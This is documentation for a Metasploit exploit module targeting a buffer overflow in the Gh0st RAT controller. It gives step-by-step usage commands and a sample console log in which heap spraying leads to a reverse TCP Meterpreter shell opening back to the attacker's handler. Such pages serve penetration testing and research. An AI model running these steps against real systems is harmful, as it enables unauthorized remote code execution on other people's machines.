## Vulnerable Application

  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
  This vulnerability can allow remote code execution in the context of the user who ran it.

  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)

## Verification Steps

  1. Run the application
  2. Start msfconsole
  3. Do: `use exploit/windows/misc/gh0st`
  4. Do: `set rhost [ip]`
  5. Do: `exploit`
  6. Get a shell

## Options

  **MAGIC**

  This is the 5 character magic used by the server.  The default is `Gh0st`

## Scenarios

### Windows XP SP3 with gh0st 3.6

```
msf > use exploit/windows/misc/gh0st 
msf exploit(gh0st) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(gh0st) > exploit

[*] Started reverse TCP handler on 1.2.3.4:4444 
[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
[*] 1.2.3.1.108:80 - Spraying heap...
[*] 1.2.3.1:80 - Trying command 103...
[*] Sending stage (956991 bytes) to 1.2.3.1
[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
[*] 1.2.3.1:80 - Server closed connection

meterpreter >
```
